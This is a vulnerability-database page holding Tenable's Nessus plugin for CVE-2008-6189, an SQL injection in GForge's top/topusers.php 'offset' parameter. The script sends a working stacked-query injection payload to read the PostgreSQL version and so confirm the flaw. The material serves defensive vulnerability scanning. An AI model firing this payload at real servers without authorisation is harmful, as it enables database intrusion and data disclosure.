Lucene search

K
nessusThis script is Copyright (C) 2008-2022 Tenable Network Security, Inc.GFORGE_OFFSET_SQL_INJECTION.NASL
HistoryOct 14, 2008 - 12:00 a.m.

GForge top/topusers.php offset Parameter SQL Injection

2008-10-1400:00:00
This script is Copyright (C) 2008-2022 Tenable Network Security, Inc.
www.tenable.com
17

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

42.0%

The remote host is running GForge, an open source, web-based project management and collaboration software.

The installed version of GForge fails to sanitize user-supplied input to the ‘offset’ parameter in the ‘top/topusers.php’ script before using it in a database query. Regardless of PHP’s ‘magic_quotes_gpc’ setting, an unauthenticated attacker can exploit this issue to manipulate database queries, resulting in disclosure of sensitive information or attacks against the underlying database.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(34399);
  script_version("1.23");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2008-6189");
  script_bugtraq_id(31674);
  script_xref(name:"EDB-ID", value:"6707");

  script_name(english:"GForge top/topusers.php offset Parameter SQL Injection");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is prone to a SQL
injection attack.");
  script_set_attribute(attribute:"description", value:
"The remote host is running GForge, an open source, web-based
project management and collaboration software.

The installed version of GForge fails to sanitize user-supplied input
to the 'offset' parameter in the 'top/topusers.php' script before
using it in a database query.  Regardless of PHP's 'magic_quotes_gpc'
setting, an unauthenticated attacker can exploit this issue to
manipulate database queries, resulting in disclosure of sensitive
information or attacks against the underlying database.");
  # http://web.archive.org/web/20120609055537/http://gforge.org:80/gf/project/gforge/tracker/?action=TrackerItemEdit&tracker_item_id=5552
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?86d3b408");
  script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_cwe_id(89);

  script_set_attribute(attribute:"plugin_publication_date", value:"2008/10/14");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:gforge:gforge");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008-2022 Tenable Network Security, Inc.");

  script_dependencies("gforge_detect.nasl");
  script_require_keys("www/gforge");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0, "The web server on port "+port+" does not support PHP");

install = get_install_from_kb(appname:'gforge', port:port);
if (isnull(install)) exit(0, "The 'www/"+port+"/gforge' KB item is missing.");

dir = install['dir'];

# Try to exploit the issue to discover the PostgreSQL version.
url = dir + "/top/topusers.php?offset=0;select+1,version()+as+user_name,3,4,5;";

w = http_send_recv3(method:"GET", item:url,port:port);
if (isnull(w)) exit(1, "the web server on port "+port+" did not answer");
  res = w[2];

if (
    'a href="/users/PostgreSQL' >< res &&
    "Powered By GForge" >< res &&
    egrep(pattern:">PostgreSQL [0-9]+\..+ on.+compiled by.+",string:res)
  )
  {
    set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);

    version = strstr(res,"PostgreSQL");
    version = version - strstr(version,'/">PostgreSQL');

    if (report_verbosity && version)
    {
      report = string (
        "\n",
        "Nessus was able to exploit this issue to discover the version of\n",
        "PostgreSQL installed on the remote host using the following URL :\n",
        "\n",
        "  ", build_url(port:port, qs:url), "\n",
        "\n",
        "It is :\n",
        "\n",
        "  ", version, "\n"
      );
      security_hole(port:port, extra:report);
    }
    else security_hole(port);
  }
VendorProductVersionCPE
gforgegforgecpe:/a:gforge:gforge

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

42.0%

Related for GFORGE_OFFSET_SQL_INJECTION.NASL